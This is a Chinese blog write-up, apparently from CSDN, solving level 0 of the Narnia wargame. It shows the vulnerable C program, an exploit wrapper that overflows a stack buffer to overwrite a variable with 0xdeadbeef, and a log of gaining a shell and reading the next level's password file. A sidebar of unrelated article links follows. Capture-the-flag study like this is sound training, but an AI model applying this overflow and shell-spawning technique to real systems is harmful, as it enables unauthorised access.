narnia0

最新推荐文章于 2023-02-15 23:01:01 发布
最新推荐文章于 2023-02-15 23:01:01 发布
阅读量365 收藏
点赞数
分类专栏: wargames wargames-writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuimuyq/article/details/50672687
版权 
/* narnia0.c */
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <stdlib.h>

int main(){
	long val=0x41414141;
	char buf[20];

	printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
	printf("Here is your chance: ");
	scanf("%24s",&buf);

	printf("buf: %s\n",buf);
	printf("val: 0x%08x\n",val);

	if(val==0xdeadbeef)
		system("/bin/sh");
	else {
		printf("WAY OFF!!!!\n");
		exit(1);
	}

	return 0;
}


/* hacker0.c */
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
        char buffer[2048] = {0};
        int pfd[2] = {0};
        pid_t pid;

        if (pipe(pfd))
                return 0;

        pid = fork();
        if (pid > 0){
                close(pfd[0]);
                write(pfd[1], "UUUUUUUUUUUUUUUUUUUU\xef\xbe\xad\xde", 24);

                while (gets(buffer)) {
                    buffer[strlen(buffer) + 1] = '\0';
                    buffer[strlen(buffer)] = '\n';
                    write(pfd[1], buffer, strlen(buffer));
                }

                close(pfd[1]);
        } else if (pid == 0) {
                close(pfd[1]);
                close(STDIN_FILENO);
                dup2(pfd[0], STDIN_FILENO);

                execle(argv[1], argv[1], NULL, NULL);
                close(pfd[0]);
        }

        return 0;
}


root@today:~# ssh narnia0@178.79.134.250

narnia0@178.79.134.250's password: 

narnia0@melinda:~$ cd /tmp/shadowcoder0

narnia0@melinda:/tmp/shadowcoder0$ ls
hacker0.c  narnia0.c

narnia0@melinda:/tmp/shadowcoder0$ gcc hacker0.c -o hacker0 -m32

narnia0@melinda:/tmp/shadowcoder0$ ./hacker0 /narnia/narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: xxxxxxxxxxxxxxxxxxxxᆳ
val: 0xdeadbeef
whoami
narnia1
cat /etc/narnia_pass/narnia1
efeidiedae


shuimuyq
关注
专栏目录
170828 WarGames-Narnia(3)
whklhhhh的博客
09-02 423
1625-5 王子昂 总结《2017年8月28日》 【连续第329天总结】 A. WarGames-narnia3 B.Level 3int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // [sp+18h] [bp-58h]@10 int v4; // [sp+38
二进制学习之narnia0
sojrs_sec的博客
09-03 292
学习平台:http://overthewire.org/wargames/narnia/ 密码:narnia0:narnia0 Cd /narnia 一:分析 运行 ./narnia0 从提示看,要我们把val的值从0x41414141 转换成0xdead 执行后会提示我们输入值,我这里输入一堆a,发现buf为24字节的a,val为a的16进制数 而当输入值只有一个a时,val为0x414141...
170823 WarGames-Narnia(0)
whklhhhh的博客
08-23 398
1625-5 王子昂 总结《2017年8月23日》 【连续第324天总结】 A. Narnia B. Level 0文件在/narnia/中,运行narnia0,提示要将value从0x41414141变为0xdeadbeef 拖下来IDA反编译可知int __cdecl main(int argc, const char **argv, const char **envp) { i
ns3学习(一)——first.cc
qq_45926015的博客
04-09 1736
一、first.cc源码内容 /* -*- Mode:C++; c-file-style:"gnu"; indent-tabs-mode:nil; -*- */ /* * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published by the Free Softwa
start.S详解学习(一):设置 CPU 模式
最新发布
叫好与叫座虽然不是对立面,但想在同一个作品中达到双重效果很难。
02-15 440
去修改了IRQ_STACK_START ,FIQ_STACK_START ,FREE_RAM_END和FREE_RAM_SIZE的值。至于为何这么修改,后面遇到的时候会具体再解释。同上,
nukkit跨服进java服_Nukkit,一款核能驱动级 Minecraft: PE 服务端,开启属于 Minecraft: PE 的高性能开服时代!...
weixin_42516490的博客
03-02 346
Nukkit This program is free software: you can redistribute it and/or modifyit under the terms of the GNU Lesser General Public License as published bythe Free Software Foundation, either version 3 of ...
Narnia Wallpaper New Tab Background-crx插件
03-13
这是Narnia Wallpaper New Tab Background的扩展,Nannia Wallpaper New Tab Background使我们的童年时代成为电影 毫无疑问,《纳尼亚传奇》是一部电影,它定义了我们许多人的数百万个童年,就像我们一样。 如果您想...
Chronicles of Narnia Search-crx插件
04-05
语言:English (United States) 搜索《纳尼亚传奇》,获取最新消息! 使用您喜欢的游戏在网络上搜索:纳尼亚传奇! 通过此搜索扩展程序,您可以轻松获得最佳搜索结果,同时在背景中拥有最佳的纳尼亚传奇图片,并且当...
C与模块化
mayi_xiaochaun的博客
05-09 617
stack.h /* * Copyright (C) 2019 0.1gCode * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published...
Linux之epoll实现
04-03
This program is free software; you can redistribute it and/or modify 6. * it under the terms of the GNU General Public License as published by 7. * the Free Software Foundation; either version 2 of the License, or 8. * (at your option) any later version
Notepad++编辑器
09-05
Notepad++ 文本编辑器 This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
You Can Program in C++光盘文件 (编程你也行) part1
03-16
You can program的配套光盘,包括使学习过程更为愉快的工具库,还有 一个完整的c++编绎器(MinGW),以及可在两款IDE中选择,并且有 有windows上运行的和Linux系统上的,及工具源代码,练习答案...等等。
linux下红黑树使用实例
lv_yjie2011的专栏
01-19 1373
最近使用到红黑树写了一个电话本,使用的linux内核中的标准接口,然后加上了一些自己写的接口和测试程序,记录如下,方便后续使用,以下代码网上几乎都可以找到,只是根据自己所做的项目做了一点修正: rbtree.h /* Red Black Trees (C) 1999 Andrea Arcangeli This program is free software; you c
DES的代码,因为是用QT写的。所以说直接复制粘贴是不能运行的啊。
CodeMySky的专栏
03-09 811
/*This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of th
ls官方源代码
xuchaoxin1375的博客
05-15 1986
/* `dir', `vdir' and `ls' directory listing programs for GNU. Copyright (C) 85, 88, 90, 91, 1995-2003 Free Software Foundation, Inc. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public
UBOOT启动流程
feelinghappy的专栏
08-22 600
1.关于启动流程 1.1 启动阶段分为3个,bl0,bl1,bl2。下面只是就功能方面对它们做说明,实际设计的时候,也许会对其具体功能做出调整,也就是说,这几个阶段的划分是就功能而言的,不能看得太死。 bl0:出厂的时候就固化在irom中一段代码,主要负责拷贝8kb的bl1到s5pv210的一个96kb大小内部sram(Internal SRAM)中运行。值得注意的是s5pv210的Internal SRAM支持的bl1的大小可以达到16kb,容量的扩增是为了适应bootloder变得越来复...
从mysql源码中学习程序注释技巧
spfLinux的博客
07-09 410
ha_example.cc: 注释1: /* Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved.   This program is free software; you can redistribute it and/or modify   it under the terms of
linux aes 源码,代码阅读 - Linux\kernel\linux-5.0\drivers\crypto\omap-aes.h
weixin_42168830的博客
05-12 166
/** Cryptographic API.** Support for OMAP AES HW ACCELERATOR defines** Copyright (c) 2015 Texas Instruments Incorporated** This program is free software; you can redistribute it and/or modify* it unde...
实用工具类
oMiconlee的博客
11-30 297
/* * This program is free software; you can redistribute it and/or modify it under the * terms of the GNU Lesser General Public License, version 2.1 as published by the Free Software * Foundation.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值